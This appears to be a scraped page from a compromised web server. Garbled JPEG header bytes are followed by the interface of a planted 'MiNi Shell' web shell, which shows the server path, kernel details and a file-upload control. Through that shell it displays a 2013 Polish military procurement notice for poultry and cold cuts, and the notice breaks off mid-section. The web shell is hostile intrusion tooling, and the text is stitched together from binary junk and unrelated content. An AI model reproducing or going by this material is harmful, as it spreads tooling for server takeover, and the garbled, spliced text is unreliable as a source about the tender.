JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131007/406302-N-2013.html

<p class="kh_header"><b>Oleszno: Dostawa mięsa drobiowego i wędlin z mięsa drobiowego realizowana do Jednostki Wojskowej 3378 Drawsko
Pomorskie - Znak postępowania 770/2013</b><br>
<b>Numer ogłoszenia: 406302 - 2013; data zamieszczenia: 07.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3378 Drawsko Pomorskie , ul. Główna 1, 78-513 Oleszno, woj. zachodniopomorskie, tel. 94 7474572, faks 94 7474571, 7474605.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.16wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa drobiowego i wędlin z mięsa drobiowego realizowana do Jednostki Wojskowej 3378 Drawsko
Pomorskie - Znak postępowania 770/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa mięsa drobiowego i wędlin z mięsa drobiowego realizowana do Jednostki Wojskowej 3378 Drawsko Pomorskie, zgodnie z zapisami SIWZ oraz szczegółowym opisem przedmiotu zamówienia załącznik nr 1 do SIWZ.

ZADANIE I - MIĘSO DROBIOWE - Oleszno		
1.	Noga z kurczaka mrożona	kg	2 500
2.	Noga z kurczaka	kg	2 500
3.	Filet z piersi kurczaka	kg	2 500
4.	Filet z piersi indyka mrożony	kg	2 000
5.	Filet z piersi indyka	kg	1 500
6.	Wątroba z kurczaka	kg	1 000
7.	Żołądki kurczaka	kg	1 000

ZADANIE II - MIĘSO DROBIOWE - Złocieniec
1.	Noga z kurczaka mrożona	kg	600
2.	Noga z kurczaka	kg	530
3.	Filet z piersi indyka mrożony	kg	400
4.	Filet z piersi indyka	kg	500
Złocieniec-Przedszkole		
1.	Noga z kurczaka	kg	70
2.	Filet z piersi indyka	kg	50

ZADANIE III - MIĘSO DROBIOWE - Wałcz	
1.	Noga z kurczaka	kg	400
2.	Filet z piersi kurczaka	kg	300
3.	Filet z piersi indyka	kg	300
4.	Wątroba z kurczaka	kg	200

ZADANIE IV  - MIĘSO DROBIOWE - Mirosławiec- Nadarzyce
1.	Noga z kurczaka mrożona	kg	500
2.	Noga z kurczaka	kg	430
3.	Filet z piersi kurczaka	kg	480
4.	Filet z piersi indyka	kg	400
5.	Wątroba z kurczaka	kg	400
6.	Żołądki kurczaka	kg	400
Mirosławiec-Przedszkole
1.	Noga z kurczaka	kg	70
2.	Filet z piersi kurczaka	kg	20

ZADANIE V - WĘDLINY Z MIĘSA DROBIOWEGO - Oleszno
1.	Parówki drobiowe	kg	1 500
2.	Szynka drobiowa	kg	1 500
3.	Szynka z indyka	kg	1 500
4.	Mortadela drobiowa	kg	1 500

ZADANIE VI - WĘDLINY Z MIĘSA DROBIOWEGO- Złocieniec		
1.	Parówki drobiowe	kg	300
2.	Szynka drobiowa	kg	290
3.	Szynka z indyka	kg	180
4.	Mortadela drobiowa	kg	100
Złocieniec-Przedszkole		
1.	Parówki drobiowe	kg	0
2.	Szynka drobiowa	kg	10
3.	Szynka z indyka	kg	20

ZADANIE VII - WĘDLINY Z MIĘSA DROBIOWEGO- Wałcz
1.	Parówki drobiowe	kg	250
2.	Szynka drobiowa	kg	250
3.	Szynka z indyka	kg	250
4.	Mortadela drobiowa	kg	250

ZADANIE VIII  - WĘDLINY Z MIĘSA DROBIOWEGO - Mirosławiec- Nadarzyce
1.	Parówki drobiowe	kg	270
2.	Szynka drobiowa	kg	270
3.	Szynka z indyka	kg	270
4.	Mortadela drobiowa	kg	270
Mirosławiec-Przedszkole
1.	Parówki drobiowe	kg	30.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0, 15.11.20.00-6, 15.11.23.00-9, 15.11.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium na przedmiot zamówienia
na poszczególne zadania w kwotach:
- w zakresie zadania 1 - 5116,00 zł. brutto
- w zakresie zadania 2 - 919,00 zł. brutto
- w zakresie zadania 3 - 460,00 zł. brutto
- w zakresie zadania 4 - 896,00zł. brutto
- w zakresie zadania 5 - 1571,00 zł. brutto
- w zakresie zadania 6 - 234,00 zł. brutto
- w zakresie zadania 7 - 261,00 zł. brutto
- w zakresie zadania 8 - 289,00zł. brutto
W przypadku kiedy Wykonawca składa ofertę na kilka zadań winien zsumować wartość poszczególnych zadań
i na łączną kwotę wnieść wadium i tak np.: jeżeli Wykonawca składa ofertę na zadania od 1 do 8 wadium winno
opiewać na wartość 9746zł. brutto</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy posiadają:  
obowiązującą decyzję administracyjną właściwego powiatowego lekarza weterynarii wydaną zgodnie z art. 20 ust. 1 pkt 2 ustawy z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17, poz. 127 ze zm.)  
lub 
obowiązującą decyzję administracyjną właściwego Państwowego Powiatowego Inspektora Sanitarnego w sprawie zatwierdzania, warunkowego zatwierdzenia, przedłużenia warunkowego zatwierdzenia zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia nie zwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust.1 pkt 2 ustawy o bezpieczeństwie żywności i żywienia (Dz. U. z 2010,  Nr 136 , poz. 914 ze zm.),
lub 
zaświadczenie o wpisie do rejestru zakładów zgodnie z rozporządzeniem Ministra Zdrowia   z dnia  29 maja 2007 r., w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów  produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli  Państwowej Inspekcji Sanitarnej (Dz. U. z  2007 r. Nr 106, poz. 730).
- mają wdrożony system HACCP
Ocena spełnienia ww. warunków dokonana zostanie w oparciu o informacje zawarte w ww. dokumentach i oświadczeniach na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy wykonali, lub wykonują, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy -  w tym okresie, co najmniej dwie dostawy główne odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia i odpowiada wartościom brutto podanym poniżej: 
- zadanie 1 -  17 000,00 zł brutto
- zadanie 2 -  3 000,00 zł brutto
- zadanie 3 -  1500,00 zł brutto 
- zadanie 4 -  3 000,00 zł brutto 
- zadanie 5 -  5 000,00 zł brutto
- zadanie 6 -  800,00 zł brutto
- zadanie 7 -  850,00 zł brutto 
- zadanie 8 -  1 000,00 zł brutto 
wraz z załączeniem dowodów (poświadczeń) potwierdzających, że dostawy zostały wykonane lub są wykonywane należycie.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania ww. dowodów (poświadczeń).

W przypadku kiedy Wykonawca składa ofertę na kilka zadań winien zsumować wartość poszczególnych zadań i na łączną kwotę przedstawić wykaz dostaw i tak np.: jeżeli Wykonawca składa ofertę na zadania od 1 do 8 wykaz winien opiewać na wartość 32150,00zł. brutto
Ocena spełnienia ww. warunków dokonana zostanie w oparciu o informacje zawarte w ww. dokumentach i oświadczeniach na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Obowiązująca decyzja administracyjna właściwego powiatowego lekarza weterynarii wydaną zgodnie z art. 20 ust. 1 pkt 2 ustawy z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17, poz. 127 ze zm.)  
lub 
obowiązująca decyzja administracyjna właściwego Państwowego Powiatowego Inspektora Sanitarnego w sprawie zatwierdzania, warunkowego zatwierdzenia, przedłużenia warunkowego zatwierdzenia zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia nie zwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust.1 pkt 2 ustawy o bezpieczeństwie żywności i żywienia (Dz. U. z 2010,  Nr 136 , poz. 914 ze zm.),
lub 
zaświadczenie o wpisie do rejestru zakładów zgodnie z rozporządzeniem Ministra Zdrowia   z dnia  29 maja 2007 r., w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów  produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli  Państwowej Inspekcji Sanitarnej (Dz. U. z  2007 r. Nr 106, poz. 730).
2. dokument poświadczający wdrożony system HACCP
3. oświadczenie, że dostarczany przedmiot zamówienia odpowiada wymaganiom zamieszczonym w załączniku Nr 1 do SIWZ, zatytułowanym Szczegółowy opis przedmiotu zamówienia (załącznik nr 5),
4. oświadczenie o posiadaniu polisy ubezpieczeniowej w momencie zawarcia umowy (załącznik nr 9 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.16wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3378 Drawsko Pomorskie, ul. Główna 1, 78-513 OLESZNO
budynek nr 42 kancelaria nr 110..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 09:30, miejsce: Jednostka Wojskowa 3378 Drawsko Pomorskie, ul. Główna 1, 78-513 OLESZNO, budynek nr 42 kancelaria nr 108 - kancelaria jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I - MIĘSO DROBIOWE - Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa mięsa drobiowego:
Miejsce dostaw:
Magazyn żywnościowy JW 3378
Ul. Główna 1
78-513 Oleszno
Telefon do magazynu żywnościowego : 947474087
Telefon do kancelarii żywnościowej: 947474217
1. Noga z kurczaka mrożona kg 2 500
2.Noga z kurczaka kg 2 500
3.Filet z piersi kurczaka kg 2 500
4. Filet z piersi indyka mrożony kg 2 000
5. Filet z piersi indyka kg 1 500
6. Wątroba z kurczaka kg 1 000
7. Żołądki kurczaka kg 1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II - MIĘSO DROBIOWE- Złocieniec, Złocieniec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa mięsa drobiowego realizowana do Jednostki Wojskowej 3378 Drawsko Pomorskie
Miejsce dostaw:
Magazyn żywnościowy JW. 3378 przy JW 1696
Ul. Czwartaków 4
78-524 Złocieniec
Telefon do magazynu żywnościowego : 943637165
Telefon do kancelarii żywnościowej: 943637540
Magazyn żywnościowy Przedszkola
ul. Pancerniaków 5 78-524 Złocieniec
Telefon do magazynu przedszkola : 943637389
Złocieniec
1. Noga z kurczaka mrożona kg 600
2. Noga z kurczaka kg 530
3. Filet z piersi indyka mrożony kg 400
4. Filet z piersi indyka kg 500
Złocieniec-Przedszkole
1. Noga z kurczaka kg 70
2. Filet z piersi indyka kg 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE III - MIĘSO DROBIOWE - Wałcz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa mięsa drobiowego realizowana do Jednostki Wojskowej 3378 Drawsko
Pomorskie
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 4094
Ul. Kościuszki 24
78-600 Wałcz
Telefon do magazynu żywnościowego : 672502085
Telefon do kancelarii żywnościowej: 672502080.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE IV - MIĘSO DROBIOWE - Mirosławiec- Nadarzyce, Mirosławiec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa mięsa drobiowego realizowana do Jednostki Wojskowej 3378 Drawsko
Pomorskie
Miejsce dostaw:
Magazyn żywnościowy JW. 3378 przy JW. 3299
78-651 Mirosławiec Górny
Telefon do kancelarii żywnościowej: 672505788
Magazyn żywnościowy Przedszkola
